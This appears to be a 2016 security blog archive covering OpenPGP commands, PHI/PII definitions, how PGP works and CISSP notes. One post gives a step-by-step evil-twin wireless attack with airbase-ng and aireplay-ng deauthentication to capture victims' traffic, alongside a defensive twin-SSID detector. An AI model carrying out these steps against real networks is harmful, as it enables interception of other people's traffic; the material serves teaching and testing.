Saturday 2 July 2016

How to encrypt and decrypt files using OpenPGP encryption

Some useful OpenPGP commands on Linux.

Generating keys:
gpg2 --gen-key

Listing keys:
gpg2 --list-secret-keys

Exporting public key:
gpg --armor --export you@domain.com > mypublickey.asc
Or exporting the public key to a key server:
gpg --keyserver search.keyserver.net --send-key you@domain.com

Exporting private key:
gpg2 --armor --export-secret-keys your_email@domain.com > myprivatekey.asc

Encrypting a file (--recipient selects the public key to encrypt to; without it gpg2 prompts for one):
gpg2 --output file.gpg --recipient recipient@domain.com --encrypt file.txt

Importing the public key on the recipient PC:
gpg2 --import senderpublickey.asc

Decrypting a file:
gpg2 --output file.txt --decrypt file.gpg

Wednesday 29 June 2016

Mis-Association attacks on wireless

A mis-association attack works by getting a computer to connect to your Kali machine, either by advertising one of the wireless networks it has connected to before, or by using the same SSID as a network that is currently available and has clients. For example, if a computer was connected to a Wi-Fi network called "Public-wifi" in the past, that name will be discovered and used to attack the host.

The steps are as below:

  • Find one of the wireless SSID names that the victim has connected to before, using "airodump-ng"
  • Set up a new access point with exactly the same name
  • Send a de-auth message to the victim so that it is disconnected from the current AP and tries to connect again
  • As the SSID you created is already on the victim's list, it will connect to your AP
  • You can start capturing the victim's traffic!

To achieve this, the steps below need to be followed:

  • airmon-ng start wlan0
  • airodump-ng mon0 -- You can see the station is trying to connect to a list of APs that it has connected to before (Probe column), e.g. Public-wifi

Note: make sure the SSID is not already present in the current list of APs.

  • airbase-ng --essid "Public-wifi" -c 1 mon0 -- This makes Kali an access point that clients can authenticate to and connect
  • Set up DHCP and other settings as per the previous section (Rogue access points)
  • Now the client station will try to connect to your computer, as it has the same SSID in its database
  • If the client machine is already connected to another Wi-Fi network, start a de-auth attack as below
  • aireplay-ng -0 0 -a 22:AF:3A:5E:22:3D mon0 -- Forces clients to reauthenticate and connect to our machine
  • Monitor the output of the airbase-ng command to see when the victim connects
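From the defender's side, the tell-tale sign of the access point set up above is the same ESSID being advertised by more than one BSSID, often with a weaker security mode than the real network. This added example (not from the post) flags such twins in airodump-ng style CSV records; the BSSIDs, times and the HomeNet network are constructed sample data.

```shell
#!/bin/sh
# Constructed sample in airodump-ng's AP CSV column order (BSSID, first seen,
# last seen, channel, speed, privacy, cipher, auth, power, beacons, IVs,
# LAN IP, ID-length, ESSID, key). Two BSSIDs claim "Public-wifi"; the second
# one is open (OPN), the classic rogue-twin pattern.
AP_CSV='BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2016-06-29 10:00:00, 2016-06-29 10:05:00, 6, 54, WPA2, CCMP, PSK, -40, 120, 0, 0.0.0.0, 11, Public-wifi,
AA:BB:CC:00:00:02, 2016-06-29 10:03:00, 2016-06-29 10:05:00, 1, 54, OPN, , , -30, 60, 0, 0.0.0.0, 11, Public-wifi,
AA:BB:CC:00:00:03, 2016-06-29 10:00:00, 2016-06-29 10:05:00, 11, 54, WPA2, CCMP, PSK, -55, 110, 0, 0.0.0.0, 8, HomeNet,'

# Print "ESSID<TAB>number-of-BSSIDs<TAB>privacy-modes" for every ESSID that is
# advertised by more than one BSSID. Mixed modes such as WPA2/OPN mean one of
# the twins is offering the network name without the real network's protection.
find_twin_ssids() {
    printf '%s\n' "$AP_CSV" | awk -F', *' '
        NR == 1 || $1 == "" { next }   # skip the header line and blank rows
        $14 == "" { next }              # hidden SSID: nothing to compare by name
        {
            n[$14]++
            modes[$14] = (modes[$14] == "" ? $6 : modes[$14] "/" $6)
        }
        END {
            for (s in n)
                if (n[s] > 1) printf "%s\t%d\t%s\n", s, n[s], modes[s]
        }'
}

find_twin_ssids
```

Feed the output of `airodump-ng --write <prefix>` (the `<prefix>-01.csv` file, AP section) into AP_CSV to run it over real captures.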


Tuesday 21 June 2016

PHI vs PII vs Sensitive information

Protected Health Information (PHI)

Protected Health Information (PHI) is an individual's health information that is created or received by a health care provider in relation to the provision of health care by a covered entity, and that identifies or could reasonably identify the individual. The 18 identifiers that are considered PHI are included in OHRPP Guidance & Procedures: Health Insurance Portability and Accountability Act (HIPAA).
An individual’s personal and health information that is created, received, or maintained by a health care provider or health plan and includes at least one of the 18 personal identifiers listed below in association with the health information:
  • Name
  • Street address
  • All elements of dates except year
  • Telephone number
  • Fax number
  • Email address
  • URL address
  • IP address
  • Social Security number
  • Account numbers
  • License numbers
  • Medical Record number
  • Health plan beneficiary #
  • Device identifiers and their serial numbers
  • Vehicle identifiers and serial number
  • Biometric identifiers (finger and voice prints)
  • Full face photos and other comparable images
  • Any other unique identifying number, code, or characteristic


Limited Data Set - a limited data set can include the following identifiers: a unique number, code, or characteristic that is not one of the identifiers listed above, geographic data (without street address), and/or dates.


Personal Identifiable Information (PII)

Personal Identifiable Information (PII) is defined as data or other information which identifies an individual, or provides information about an individual in a way that is reasonably likely to enable identification of a specific person and make personal information about them known. Personal information includes, but is not limited to, information regarding a person's home or other personal address, social security number, driver's license, marital status, financial information, credit card numbers, bank accounts, parental status, sex, race, religion, political affiliation, personal assets, medical conditions, medical records or test results, home or other personal phone numbers, non-university address, employee number, personnel or student records and so on.
Information about an individual which includes any of the identifiers below:
  • Name
  • Street address
  • All elements of dates except year
  • Telephone number
  • Fax number
  • Email address
  • URL address
  • IP address
  • Social Security number
  • Account number, credit or debit card number, in combination with any required security code, access code or password that would permit access to an individual's financial account
  • Driver's License number or California or other identification card number
  • Device identifiers and their serial numbers
  • Vehicle identifiers and serial number
  • Biometric identifiers (finger and voice prints)
  • Full face photos and other comparable images
  • Any other unique identifying number, code, or characteristic (e.g., student identification number)



Sensitive Data

An individual's first name (or first initial) and last name in combination with any of the following:
  • Social Security Number
  • Driver's License Number or California ID card number
  • Financial account information such as a credit card number
  • Medical Information




Monday 20 June 2016

How does PGP Work?

PGP combines some of the best features of both conventional and public key cryptography. PGP is a hybrid cryptosystem. When a user encrypts plaintext with PGP, PGP first compresses the plaintext. Data compression saves modem transmission time and disk space and, more importantly, strengthens cryptographic security. 

Most cryptanalysis techniques exploit patterns found in the plaintext to crack the cipher. Compression reduces these patterns in the plaintext, thereby greatly enhancing resistance to cryptanalysis. (Files that are too short to compress or which don’t compress well aren’t compressed.) 

PGP then creates a session key, which is a one-time-only secret key. This key is a random number generated from the random movements of your mouse and the keystrokes you type. This session key works with a very secure, fast conventional encryption algorithm to encrypt the plaintext; the result is ciphertext. Once the data is encrypted, the session key is then encrypted to the recipient's public key. This public-key-encrypted session key is transmitted along with the ciphertext to the recipient.


Decryption works in the reverse. The recipient’s copy of PGP uses his or her private key to recover the temporary session key, which PGP then uses to decrypt the conventionally-encrypted ciphertext.
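The gpg2 commands from the "How to encrypt and decrypt files using OpenPGP encryption" post above, run end to end against the hybrid scheme just described, as an added example that is not part of either original post. It assumes gpg2 (or gpg, GnuPG 2.1+) is installed, uses two throwaway keyrings so the export/import step is real, and the user ID, e-mail and file contents are constructed; `--list-packets` exposes the structure described above: one public-key-encrypted session key packet followed by the symmetrically encrypted data packet.

```shell
#!/bin/sh
# Round trip: recipient generates a key pair and exports the public half; the
# sender imports it and encrypts; the recipient decrypts. The function body is
# a subshell so the GNUPGHOME changes do not leak into the caller's environment.
pgp_roundtrip() (
    GPG=$(command -v gpg2 || command -v gpg) || { echo skipped; return 0; }
    work=$(mktemp -d) || return 1
    mkdir -m 700 "$work/recipient" "$work/sender" || return 1
    printf 'constructed plaintext for the demo\n' > "$work/file.txt"

    # Recipient side: unattended key generation (no passphrase, demo only), then
    # "gpg --armor --export <email>" to hand the public key to the sender.
    export GNUPGHOME="$work/recipient"
    "$GPG" --batch --quiet --pinentry-mode loopback --passphrase '' \
        --quick-gen-key 'Recipient <recipient@example.com>' default default never || return 1
    "$GPG" --batch --quiet --armor --export recipient@example.com > "$work/recipient.asc" || return 1
    gpgconf --kill gpg-agent 2>/dev/null

    # Sender side: import the recipient's public key and encrypt to it.
    # --trust-model always replaces the ownertrust prompt that an unsigned,
    # freshly imported key would otherwise trigger (and abort under --batch).
    export GNUPGHOME="$work/sender"
    "$GPG" --batch --quiet --import "$work/recipient.asc" || return 1
    "$GPG" --batch --quiet --yes --trust-model always --recipient recipient@example.com \
        --output "$work/file.gpg" --encrypt "$work/file.txt" || return 1

    # The hybrid layout: a "pubkey enc" packet carrying the session key encrypted
    # to the recipient's public key, then the "encrypted data" packet.
    "$GPG" --batch --quiet --list-packets "$work/file.gpg" 2>/dev/null \
        | grep -E '^:(pubkey enc|encrypted data)' >&2
    gpgconf --kill gpg-agent 2>/dev/null

    # Recipient side: "gpg2 --output file.txt --decrypt file.gpg", then compare.
    export GNUPGHOME="$work/recipient"
    "$GPG" --batch --quiet --pinentry-mode loopback --passphrase '' \
        --output "$work/out.txt" --decrypt "$work/file.gpg" || return 1
    if cmp -s "$work/file.txt" "$work/out.txt"; then echo ok; else echo mismatch; fi

    gpgconf --kill gpg-agent 2>/dev/null
    rm -rf "$work"
)

pgp_roundtrip
```

The function prints `ok` when the decrypted file matches the original, or `skipped` when no gpg binary is on PATH; the packet listing goes to stderr.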

Below image shows how PGP encryption works

Below image shows how PGP decryption works


CISSP Pocket guide check list

Here are my ISC2 CISSP notes.


If you need a quick and summary index of what is required to pass CISSP exam, this would help.

GENERIC ARCHITECTURE DESIGN PRINCIPLES

When designing any architecture there are certain principles that need to be considered and followed. They ensure the architecture is aligned with the business strategy, vision and goals. Usually the enterprise architecture team is responsible for defining those principles with senior management's help and guidance. Below are some principles to be used when designing a security architecture.
  • Principle 1: Comprehensive documentation
  • Principle 2: No plan is fool-proof
  • Principle 3: Successful business operation is supported by reasonable and appropriate controls
  • Principle 4: Business requirements require translation into forms that technical architecture designers can turn into conceptual models
  • Principle 5: It makes no sense to design something the engineers can't build
  • Principle 6: Partial understanding results in incomplete designs
  • Principle 7: Use attack trees
  • Principle 8: Business and technical users will avoid complex and hard-to-use security controls
  • Principle 9: Testing models and final architecture implementations must take the design into consideration
  • Principle 10: Ensure architecture constraints are reviewed during the change management process
  • Principle 11: Frequently assess risk
  • Principle 12: Meeting security requirements means the architecture is compliant with regulatory and best-practice constraints

Gartner’s Six Principles of Resilience for Digital Business Risk and Security


There are 6 main principles when talking about information security. These principles were first introduced in 2016 by Gartner's risk and security division.

Principles are:

  • Principle No. 1: Stop Focusing on Check Box Compliance, and Shift to Risk-Based Decision Making
    • Security is not the same old beast. Information security must be a top-down approach, driven by identified business risk. Risk management and risk analysis are the first big step of any information security work.
  • Principle No. 2: Stop Solely Protecting Infrastructure, and Begin Supporting Business Outcomes
    • Information security is a business enabler. Security is there to help the business achieve its goals and targets. The only way to have a successful information security architecture is to make sure it is aligned with the business strategy.
  • Principle No. 3: Stop Being a Defender, and Become a Facilitator
    • Again, the aim of information security is to help the business hit its targets. Of course security is important, but if we are blocking business processes, it is useless.
  • Principle No. 4: Stop Trying to Control Information; Instead, Determine How It Flows
    • The big shift in the security mindset is moving away from local and limited controls towards a holistic approach that looks at flows and processes.
  • Principle No. 5: Accept the Limits of Technology and Become People-Centric
    • These days more and more attacks are the result of a lack of user awareness. Training people and using resources well is as important as having technical controls.
  • Principle No. 6: Stop Trying to Perfectly Protect Your Organization, and Invest in Detection and Response
    • We all know it is impossible to have a completely safe environment. Threats and vulnerabilities are always there. A proper incident response plan and operation is crucial for any business.